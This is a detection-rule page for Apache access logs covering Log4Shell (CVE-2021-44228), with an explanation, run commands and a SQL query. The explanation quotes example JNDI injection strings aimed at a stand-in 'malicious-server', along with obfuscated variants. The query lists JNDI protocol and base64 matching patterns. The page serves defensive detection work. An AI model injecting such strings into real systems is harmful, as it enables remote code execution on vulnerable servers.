Detection: Log4Shell Vulnerability
Overview
Detect when a web server received requests containing Log4j/Log4Shell exploitation patterns (CVE-2021-44228, CVE-2021-45046). This detection focuses on identifying attempts to exploit a critical remote code execution vulnerability in the widely-used Log4j Java logging framework.
The Log4Shell vulnerability exploits Log4j's JNDI (Java Naming and Directory Interface) lookup functionality, which allows for dynamic loading of Java classes. When Log4j logs a string containing a JNDI lookup expression (like ${jndi:ldap://malicious-server/payload}), it attempts to resolve the reference, potentially executing arbitrary code from a remote source. Attackers typically inject these JNDI expressions into fields that are likely to be logged, such as HTTP headers, form fields, and URL parameters.
Multiple variations of the attack exist, including obfuscation techniques to bypass detection, such as nested expressions, HTML entity encoding, and using string manipulation functions within the JNDI expression. This detection identifies both simple and sophisticated attack attempts by scanning for common JNDI injection patterns in HTTP request URIs and User-Agent headers, including standard patterns (${jndi:...}), nested expressions (${${...}}), encoded variants (${jndi:...}), and obfuscated patterns using Log4j's lookup features (${lower:${upper:j}ndi}).
When this detection triggers, security teams should immediately isolate affected systems if possible, check if the exploitation attempt was successful by looking for unusual outbound connections or newly created files, update all Log4j installations to patched versions (2.17.0 or newer), implement web application firewall rules to block JNDI lookup patterns, scan all applications and dependencies for Log4j vulnerabilities, and enhance logging to identify potential compromises. While this detection may occasionally trigger on security scanning or legitimate applications using ${} syntax in parameters, these cases are extremely rare in normal web traffic.
References:
Usage
Run the detection in your terminal:
powerpipe detection run apache_access_log_detections.detection.log4shell_vulnerabilitySnapshot and share results via Turbot Pipes:
powerpipe loginpowerpipe detection run apache_access_log_detections.detection.log4shell_vulnerability --shareSQL
This detection uses a named query:
select tp_timestamp as timestamp,request_method as operation,request_uri as resource,status,http_user_agent as actor,tp_source_ip as source_ip,tp_id as source_id,-- Create new aliases to preserve original row datastatus as status_src,timestamp as timestamp_src,*exclude (status, timestamp)
from apache_access_logwhere request_uri is not null and ( -- JNDI lookup patterns request_uri ilike '%${jndi:%' or request_uri ilike '%$%7bjndi:%' or request_uri ilike '%${%7bjndi:%' or request_uri ilike '%jndi://%' -- Common protocol exploits or request_uri ilike '%jndi:ldap:%' or request_uri ilike '%jndi:dns:%' or request_uri ilike '%jndi:rmi:%' or request_uri ilike '%jndi:http:%' or request_uri ilike '%jndi:iiop:%' or request_uri ilike '%jndi:corba:%' -- Base64 encoded variants or request_uri ilike '%jTmRp%' or request_uri ilike '%ak5kaQ%' or request_uri ilike '%JE5ESQB%' or request_uri ilike '%SnNkaQ%' )order by tp_timestamp desc;